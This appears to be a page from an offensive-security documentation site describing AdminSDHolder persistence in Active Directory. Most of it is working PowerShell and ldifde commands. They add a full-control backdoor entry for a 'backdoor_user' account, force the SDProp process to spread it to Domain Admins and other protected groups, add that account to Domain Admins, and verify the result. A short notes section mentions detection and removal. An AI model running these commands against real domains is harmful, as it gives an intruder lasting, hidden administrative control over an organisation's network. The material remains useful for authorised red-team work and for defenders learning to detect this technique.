Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

AdminSDHolder is a container whose ACL is copied to all protected objects (Domain Admins, Enterprise Admins, etc.) every 60 minutes by SDProp process. Modify AdminSDHolder ACL → persistent access to protected groups.

Protected Groups

  • Domain Admins
  • Enterprise Admins
  • Schema Admins
  • Administrators
  • Account Operators
  • Backup Operators
  • Server Operators
  • Domain Controllers
  • krbtgt

Add Backdoor ACE

PowerView

Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=domain,DC=local" -PrincipalIdentity backdoor_user -Rights All

AD Module

$sid = New-Object System.Security.Principal.SecurityIdentifier (Get-ADUser backdoor_user).SID
$acl = Get-Acl "AD:CN=AdminSDHolder,CN=System,DC=domain,DC=local"
$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $sid, "GenericAll", "Allow"
$acl.AddAccessRule($ace)
Set-Acl "AD:CN=AdminSDHolder,CN=System,DC=domain,DC=local" $acl

Wait for SDProp (or Force)

SDProp runs every 60 minutes. Force it: 
Invoke-ADSDPropagation
Or manually trigger: 
# Run as SYSTEM on DC
ldifde -i -f - <<EOF
dn:
changetype: modify
replace: runProtectAdminGroupsTask
runProtectAdminGroupsTask: 1
EOF

After SDProp Runs

backdoor_user now has GenericAll on Domain Admins, Enterprise Admins, etc. 
# Add yourself to Domain Admins
Add-DomainGroupMember -Identity "Domain Admins" -Members backdoor_user
Even if removed from group, ACL persists through next SDProp cycle.

Verify

Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ? {$_.IdentityReference -match "backdoor_user"}

Notes

  • Very persistent — ACL rewritten every 60 min
  • Removing ACE from AdminSDHolder removes persistence
  • Detection: monitor AdminSDHolder ACL changes
  • Requires Domain Admin to set initially

Quick Reference

TaskCommand
Add ACEAdd-DomainObjectAcl -TargetIdentity AdminSDHolder -PrincipalIdentity user -Rights All
Force SDPropInvoke-ADSDPropagation
VerifyCheck ACL on “Domain Admins” for backdoor user
RemoveDelete ACE from AdminSDHolder